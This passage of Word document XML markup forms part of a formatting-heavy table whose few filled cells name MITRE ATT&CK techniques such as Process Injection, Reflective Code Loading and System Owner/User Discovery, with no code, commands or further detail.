              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A7884E8" w14:textId="3BC4D480" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C8F8D2C"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0A27C979" w14:textId="4D94BD7C" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Pre-OS Boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3368DD6E"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5903A0D2" w14:textId="1609F7CC" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Owner/User Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B3D8CA6" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0349BFE2" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F52F314" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C442606" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D73AA45" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="337E2C12" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29D5B095" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05E40625"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17CC6DE5" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18A0A35D" w14:textId="5FC3DB04" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65A7F0F6" w14:textId="09190958" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76D406D3"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F16B75A" w14:textId="5E36200D" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Process Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6584C458"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316D5D34" w14:textId="17741139" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B9D69AF" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70EC3796" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="311D6D9A" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51028D61" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69F6934F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="70075BF0" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A6D775F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24894045"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407358DB" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24248F78" w14:textId="77B60523" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29A0B421" w14:textId="20883C74" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="152B1F0C"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252C6A8" w14:textId="5D78830A" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Reflective Code Loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C9BF6D2"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76589D51" w14:textId="5AC56F74" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>System Time Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4098341F" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A14614E" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AE5B138" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08CCA0EA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D45F651" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="0681F532" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="655EF036" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0632225C"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4C5CD5A0" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="207C296D" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="564E0D51" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B61CAA6"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41A7FD33" w14:textId="7347FB2F" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Rogue Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="330" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64A95E86"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509C2214" w14:textId="2DCCD128" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Virtual Machine Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="286" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10D44C95" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B8AB883" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53D53EE6" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36DAD812" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="178" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="049FEE34" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA36F8" w:rsidRPr="001019D3" w14:paraId="0507FCF7" w14:textId="77777777" w:rsidTr="00591FD8">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="383" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42A82A66" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="335" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="486F5D7A"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7361E3AA" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D67E281" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="334" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65691826" w14:textId="77777777" w:rsidR="00EA36F8" w:rsidRPr="001019D3" w:rsidRDefault="00EA36F8" w:rsidP="00EA36F8">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
